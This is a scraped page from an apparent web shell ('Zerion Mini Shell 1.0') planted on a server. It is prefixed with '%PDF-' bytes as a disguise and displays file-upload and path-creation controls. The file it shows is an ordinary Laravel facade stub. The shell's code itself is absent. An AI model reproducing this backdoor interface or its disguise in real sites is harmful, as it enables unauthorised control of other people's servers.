%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /home/silvzytp/calling_code/vendor/laravel/framework/src/Illuminate/Foundation/stubs/
Upload File :
Create Path :
Current File : //home/silvzytp/calling_code/vendor/laravel/framework/src/Illuminate/Foundation/stubs/facade.stub

<?php

namespace DummyNamespace;

use Illuminate\Support\Facades\Facade;

/**
 * @see \DummyTarget
 */
class DummyClass extends Facade
{
    /**
     * Get the registered name of the component.
     *
     * @return string
     */
    protected static function getFacadeAccessor()
    {
        return 'DummyTarget';
    }
}

Zerion Mini Shell 1.0